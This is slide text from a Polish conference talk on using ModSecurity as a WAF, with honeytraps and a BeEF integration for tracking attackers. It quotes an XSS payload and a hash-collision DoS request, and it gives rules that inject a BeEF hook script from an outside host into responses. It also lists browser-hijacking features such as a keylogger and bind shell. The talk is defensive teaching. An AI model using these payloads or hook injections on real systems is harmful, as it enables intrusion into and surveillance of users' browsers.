– POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1
– __mode=test&step=configure&set_static_uri_to=&d
efault_language=en-
us&config=&dbtype=mysql&dbserver=localhost&db
name=&dbuser=%3Cscript%3Ealert
%28%27123%27%29%3C%2Fscript
%3E&dbpass=test&dbpath=&dbport=&dbsocket=&t
est=1
19
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
20. Realne przypadki
• Movable types:
20
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
21. Realne przypadki
• ASP.NET HashTable DoS:
• Paylodem była bardzo duża ilość losowych
parametrów z pustą zawartością:
• EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138
LL=&XXST36DRX=&JRYRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0
TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=&MOCGW14ZU7=&I0JK
KKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D
3ACY8973E=&VGJPMCQHP=&AV6THWSCA7=
• SecRequestBodyLimit 131072 – domyślna
wartość
• This directive is useful to reduce susceptibility to DoS
attacks when someone is sending request bodies of very
large sizes.
21
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
22. Honeytrapy
22
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
23. Honeytrapy
• Wykorzystanie istniejących serwerów:
– Listen 8080
– Listen 8888
– Listen 8000
• Wykrywanie i blokowanie automatów
skanujących pod kątem webappek na
niestandardowych portach
• Tagowanie klientów
• Rozpoznawanie pod kątem prawdziwej
aplikacji
23
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
24. Honeytrapy
• SecRule SERVER_PORT "^(8000|8080|8888)$"
"id:'999004',phase:2,t:none,log,block,msg:'HoneyTrap
Alert: Traffic Received on Fake Port.',
setvar:ip.malicious_client=1"
• SecRule &IP:MALICIOUS_CLIENT "@eq 1"
"id:'999005',phase:2,t:none,log,block,msg:'HoneyTrap
Alert: Known Malicious Client.'"
• Integracja z WASC Web Honeypots
24
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
25. Mięsko ;)
25
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
26. BEEF
• The Browser Exploitation Framework –
zaawansowane narzędzie do pentestów
• Browser as Pentester's gateway || C&C
• Wymagane:
– Zmuszenie użytkownika do wejścia na stronę
(FB,TW, krótkie linki)
– Phishing
– XSS – dla tych którzy uważają, że XSS nic nie
znaczy
26
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
27. BEEF
• Pozwala na przejęcie kontroli nad przeglądarką
użytkownika poprzez wstrzykiwanie hooków:
– Bind shell
– Javascript command
– Odwiedzane URLe
– Skanowanie portów/dns enum/network discovery
– Man In The Browser
– Tunelowanie
– Keylogger
• Integracja z metasploit, np:
– XSS->Hook->przejęcie kontroli nad przeglądarką
– Wykorzystanie podatności, np. w Adobe
– Dostęp do shella z poziomu metasploita
27
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
28. • W jaki sposób wyśledzić prawdziwy adres
źródłowy atakującego?
– Proxy
– TOR
• Analiza powłamaniowa
28
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
29. Co mamy?
• Modsecurity jako WAF:
– Wykrywanie ataków
– Aktywacja Beefa
• BeEF jako browser exploitation framework:
– Hookowanie atakujących
– Enumeracja lokalizacji atakującego
• AuditConsole:
– Centralna konsola do analizy logów
29
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
30. modsecurity+BEEF
• Idea przedstawiona na Appsec 2012 USA
przez Rayna Barnetta
• Ograniczenie do połączeń do tych „z browsera”
• Monitorowanie atakujących
30
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
31. modsecurity+BEEF
• Filtrowanie wyjścia:
– SecResponseBodyAccess
• Modyfikacja HTTP Response data
– SecContentInjection
– SecStreamOutBodyInspection
– Zmienna STREAM_OUTPUT_BODY
– Operator @rsub
• SecRule STREAM_OUTPUT_BODY " <at> rsub
s/FUCK/****/" "phase:4,t:none,log,auditlog,pass"
31
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
32. modsecurity+BEEF
• W jaki sposób zidentyfikować atakującego?
• Założyć pułapki:
– Fake cookies
– Robots.txt
– Ukryte pola formularzy:
• SecRule STREAM_OUTPUT_BODY "@rsub
s/</form>/<input type="hidden" name="admin"
value="false"></form>/id" id:"999999",
phase:4,t:none,nolog,pass"
32
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
33. modsecurity+BEEF
• SecRule ARGS:admin "!@streq false"
"id:'9999923',phase:2,t:none,log,block,msg:'Honey
trap alert: hidden form data
manipulated',setvar:tx.malicious_client=1"
• SecRule TX:MALICIOUS_CLIENT "@eq 1"
"chain,id:'999232', phase:4, t:none, pass,
log,msg:'hooking to beef'"
• SecRule STREAM_OUTPUT_BODY "@rsub"
s/</html>/<script
src=http://10.0.0.1:5000/functions.js"></script></ht
ml>
33
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
34. modsecurity+BEEF
• Geolokalizacja:
– Lokalnie dostępne access pointy
• Uzyskanie dostępu do CMD celem wysłania
ICMP do naszego hosta:
– Analiza ruchu i wykrycie faktycznego adresu IP
34
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
35. Podsumowanie
• W modsecurity drzemią ogromne możliwości i
potencjał
• Reguły oparte na blacklistach prędzej czy
później mogą zostać ominięte
• Whitelisting trudny we wdrożeniu, utrzymaniu i
czasochłonny – zmieniające się aplikacje
• Audytowanie logów – konieczność
•
35
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
36. Podsumowanie
Dziękuję za uwagę.
lm@linuxpolska.pl
36
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl